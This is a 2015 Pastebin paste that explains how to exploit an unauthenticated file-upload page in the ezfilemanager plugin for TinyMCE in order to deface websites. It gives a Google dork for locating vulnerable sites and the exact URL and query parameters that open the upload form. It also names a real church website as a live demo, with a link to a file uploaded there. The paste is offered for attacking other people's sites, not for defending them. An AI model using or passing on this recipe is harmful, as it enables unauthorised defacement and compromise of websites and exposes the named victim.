Advertisement
Kyfx

EzFilemanager Deface Upload vulnerability

Jul 18th, 2015
387
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.77 KB | None | 0 0
  1. Modify this dork for getting mor results from Google =)
  2.  
  3. Google Dork inurl:ezfilemanager/ezfilemanager.php
  4.  
  5. Exploit : http://[xxx]/xxx/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file
  6.  
  7. Go to this url : website.com/lap/includes/tiny_mce/plugins/ezfilemanager/ezfilemanager.php and
  8. put ?sa=1&type=file after URL
  9. now url will be : http://website/PATCH/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file
  10.  
  11. Now see upload option and upload you file, you can upload ,html ,pdf ,ppt ,txt ,doc ,rtf ,xml ,xsl ,dtd ,zip ,rar ,jpg ,png files
  12.  
  13. Live Demo : http://www.monumentbiblechurch.com/administration/jscripts/tiny_mce/plugins/ezfilemanager/ezfilemanager.php?sa=1&type=file
  14.  
  15. Result : http://www.monumentbiblechurch.com/mbcphotos/files/aaaaaaaa.txt
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement